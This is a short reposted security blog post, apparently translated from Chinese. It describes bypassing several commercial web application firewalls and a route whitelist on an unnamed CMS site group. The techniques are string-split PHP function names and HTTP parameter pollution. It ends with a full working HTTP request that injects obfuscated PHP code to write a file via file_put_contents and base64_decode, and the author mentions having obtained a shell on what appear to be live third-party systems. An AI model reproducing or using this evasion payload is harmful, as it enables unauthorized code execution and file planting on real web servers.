banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

(转载) Treasure, I miss you~

Authorized for reprint, feel free to follow the public account if interested

A vulnerability left by a certain centralized station group last year was found to be intercepted this year when used. Just complaining, is this completely crazy? What’s up with Baidu Cloud WAF, Huawei Cloud WAF, and Security Dog all together...

waf bypass

It's relatively simple, just filter out the eval encoding.

image

Router whitelist restriction bypass

Casually requesting access revealed a routing restriction, only allowing access to specified paths.

640

However, it’s impossible to hardcode all paths. For example, the search function needs to receive user input. Packet capture confirmed that the search interface can be used normally and will not trigger the router whitelist restriction.

640

Therefore, it is speculated that parameter pollution can be used to bypass the restriction, for example:

Insert same name parameter#

/index.php?name=bob&name=rose

The backend may actually receive#

name=rose

After getting a shell, check the code and confirm that this interface matches any content.

Snipaste_2024-10-20_18-15-37

Final payload

POST /index.php?c=api&m=essearchlist&s=mmyzj&c=Toup&m=Zj_Post HTTP/2
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 147

id='-("fil"."e"._."pu"."t"._."contents")("./kfc2024.php",("base"."64"._."decode")('a2ZjX3ZfbWVfNTA='),FILE_APPEND)-'
Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.